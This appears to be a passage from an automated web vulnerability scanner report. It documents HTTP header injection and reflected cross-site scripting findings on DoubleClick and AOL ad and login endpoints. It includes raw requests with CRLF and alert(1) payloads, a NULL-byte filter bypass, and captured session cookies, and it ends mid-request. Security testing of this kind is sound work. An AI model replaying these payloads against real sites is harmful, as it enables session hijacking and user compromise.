GET /47115%0d%0af411b5489be/huffpost.politics/longpost;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=mid_article;hot=fb;hot=tw;u=300x250%7Cbpage%7Cmid_article%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=300x250;tile=3;ord=20736431? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.huffingtonpost.com/ads/ads_iframe.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/47115 f411b5489be/huffpost.politics/longpost;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-: Date: Sat, 26 Mar 2011 20:36:38 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 234dc%0d%0a00fe8347eca was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /234dc%0d%0a00fe8347eca/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=right_rail_flex;hot=fb;hot=tw;u=300x250,300x600%7Cbpage%7Cright_rail_flex%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=300x250,300x600;tile=5;ord=20736431? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/234dc 00fe8347eca/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died: Date: Sat, 26 Mar 2011 20:36:43 GMT Server: GFE/2.0
<h1>Error 302 Moved Temporarily</h1>
4.8. http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://my.screenname.aol.com
Path:
/_cqr/login/login.psp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f0b8d%0d%0aafccb6f9a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cat%3aSNS%7cld%3amail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aANGELIA%7csnt%3aScreenName%7csid%3a187531a0-71f6-4ddd-8234-25df9b0c705b&offerId=newmail-en-us-v2&seamless=novl&f0b8d%0d%0aafccb6f9a=1 HTTP/1.1 Host: my.screenname.aol.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; SNS_LDC=1&-&-&1299520397&1&1299520397&0; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171798825-Repeat%7C1364243798825%3B%20s_nrgvo%3DRepeat%7C1364243798828%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 26 Mar 2011 20:37:23 GMT Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Location: https://my.screenname.aol.com/_cqr/login/login.psp?f0b8d afccb6f9a=1&seamless=novl&locale=us&offerId=newmail-en-us-v2&siteState=ver%3A4%7Crt%3ASTANDARD%7Cat%3ASNS%7Cld%3Amail.aol.com%7Cuv%3AAOL%7Clc%3Aen-us%7Cmt%3AANGELIA%7Csnt%3AScreenName%7Csid%3A187531a0-71f6-4ddd-8234-25df9b0c705b&authLev=0&sitedomain=sns.webmail.aol.com&lang=en Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 0 P3P: CP="PHY ONL PRE STA CURi OUR IND"
The value of the N cookie is copied into the Set-Cookie response header. The payload 66e42%0d%0aa76191a841c was submitted in the N cookie. This caused a response containing an injected HTTP header.
Request
GET /rtx/r.js?cmd=MUS&si=16768&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=94859 HTTP/1.1 Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D69B03E6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818; TData=99999|^|61674|60489|60740|60490|56262|61576|60493|50963|60491|60515|60514|52614|53656|52842|56830|52615|60546|56918|60500|56920|56555|51133|56988|56917|53435|54173|56500|52611|54463|56969|56835|54938|61166|56761|56780; N=2:ef750afea1932931347519ba153fff1c,a07761c4014e52e7e1bc39b6a051a86866e42%0d%0aa76191a841c; ATTAC=a3ZzZWc9OTk5OTk6NjE2NzQ6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NjE1NzY6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTExMzM6NTY5ODg6NTY5MTc6NTM0MzU6NTQxNzM6NTY1MDA6NTI2MTE6NTQ0NjM6NTY5Njk=; eadx=2
Response
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 20:37:16 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Cache-Control: max-age=900 Expires: Sat, 26 Mar 2011 20:52:16 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Tue, 20-Mar-12 20:37:16 GMT; domain=.at.atwola.com Set-Cookie: ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818|50215^1^1301776636; path=/; expires=Sat, 02-Apr-11 20:37:16 GMT; domain=tacoda.at.atwola.com Set-Cookie: Tsid=0^1301171786^1301173636|16768^1301171786^1301173636; path=/; expires=Sat, 26-Mar-11 21:07:16 GMT; domain=tacoda.at.atwola.com Set-Cookie: TData=99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|60500|56920|56555|56761|56500|56988|52611|53603|54173|53435|54463|56917|56969|56718|56835|56715; expires=Tue, 20-Mar-12 20:37:16 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: N=2:a07761c4014e52e7e1bc39b6a051a86866e42 a76191a841c,7a83820d0a0dd8c854eabe6c04f3aee3; expires=Tue, 20-Mar-12 20:37:16 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjA3Mzk6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NTY1MTE6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTU0MDE6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTY3NjE6NTY1MDA6NTY5ODg6NTI2MTE6NTM2MDM6NTQxNzM6NTM0MzU6NTQ0NjM=; expires=Tue, 20-Mar-12 20:37:16 GMT; path=/; domain=.at.atwola.com Set-Cookie: eadx=x; path=/; expires=Tue, 29-Mar-11 20:37:16 GMT; domain=tacoda.at.atwola.com ntCoent-Length: 321 Content-Type: application/x-javascript Content-Length: 321
var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16lsqii1n1a3cr'; var ANSL='99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918| ...[SNIP]...
The value of the si request parameter is copied into the Set-Cookie response header. The payload 29cb8%0d%0ab6126af3077 was submitted in the si parameter. This caused a response containing an injected HTTP header.
Request
GET /rtx/r.js?cmd=MUS&si=29cb8%0d%0ab6126af3077&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=94859 HTTP/1.1 Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D69B03E6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818; TData=99999|^|61674|60489|60740|60490|56262|61576|60493|50963|60491|60515|60514|52614|53656|52842|56830|52615|60546|56918|60500|56920|56555|51133|56988|56917|53435|54173|56500|52611|54463|56969|56835|54938|61166|56761|56780; N=2:ef750afea1932931347519ba153fff1c,a07761c4014e52e7e1bc39b6a051a868; ATTAC=a3ZzZWc9OTk5OTk6NjE2NzQ6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NjE1NzY6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTExMzM6NTY5ODg6NTY5MTc6NTM0MzU6NTQxNzM6NTY1MDA6NTI2MTE6NTQ0NjM6NTY5Njk=; eadx=2
Response
HTTP/1.1 200 OK Date: Sat, 26 Mar 2011 20:37:15 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Cache-Control: max-age=900 Expires: Sat, 26 Mar 2011 20:52:15 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Tue, 20-Mar-12 20:37:15 GMT; domain=.at.atwola.com Set-Cookie: ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818|50215^1^1301776635; path=/; expires=Sat, 02-Apr-11 20:37:15 GMT; domain=tacoda.at.atwola.com Set-Cookie: Tsid=0^1301171786^1301173635|16768^1301171786^1301173586|29cb8 b6126af3077^1301171835^1301173635; path=/; expires=Sat, 26-Mar-11 21:07:15 GMT; domain=tacoda.at.atwola.com Set-Cookie: TData=99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|60500|56920|56555|56761|56500|56988|52611|53603|54173|53435|54463|56917|56969|56718|56835|56715; expires=Tue, 20-Mar-12 20:37:15 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: N=2:0cd73208ac57a723a07d874a21de8895,7a83820d0a0dd8c854eabe6c04f3aee3; expires=Tue, 20-Mar-12 20:37:15 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjA3Mzk6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NTY1MTE6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTU0MDE6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTY3NjE6NTY1MDA6NTY5ODg6NTI2MTE6NTM2MDM6NTQxNzM6NTM0MzU6NTQ0NjM=; expires=Tue, 20-Mar-12 20:37:15 GMT; path=/; domain=.at.atwola.com Set-Cookie: eadx=x; path=/; expires=Tue, 29-Mar-11 20:37:15 GMT; domain=tacoda.at.atwola.com Cteonnt-Length: 321 Content-Type: application/x-javascript Content-Length: 321
var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16lsqii1n1a3cr'; var ANSL='99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918| ...[SNIP]...
5. Cross-site scripting (reflected)previousnext There are 149 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %005f8f3"-alert(1)-"b8b286ead4a was submitted in the adurl parameter. This input was echoed as 5f8f3"-alert(1)-"b8b286ead4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=%005f8f3"-alert(1)-"b8b286ead4a HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6985 Cache-Control: no-cache Pragma: no-cache Date: Sat, 26 Mar 2011 13:14:51 GMT Expires: Sat, 26 Mar 2011 13:14:51 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... AS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=%005f8f3"-alert(1)-"b8b286ead4ahttp://ads.networksolutions.com/landing?code=P111C519S512N0B2A1D691E0000V101"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "nev ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00962c0"-alert(1)-"a036383781d was submitted in the ai parameter. This input was echoed as 962c0"-alert(1)-"a036383781d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ%00962c0"-alert(1)-"a036383781d&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7005 Cache-Control: no-cache Pragma: no-cache Date: Sat, 26 Mar 2011 13:14:19 GMT Expires: Sat, 26 Mar 2011 13:14:19 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ%00962c0"-alert(1)-"a036383781d&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=http://ads.networksolutions.com/landing?code=P61C151S512N0B2A1D687E0000V100&promo=BCXXX03936"); var fscUrl = url; va ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e67df"-alert(1)-"af922d3d5bf was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912e67df"-alert(1)-"af922d3d5bf&adurl=;ord=403758047? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: 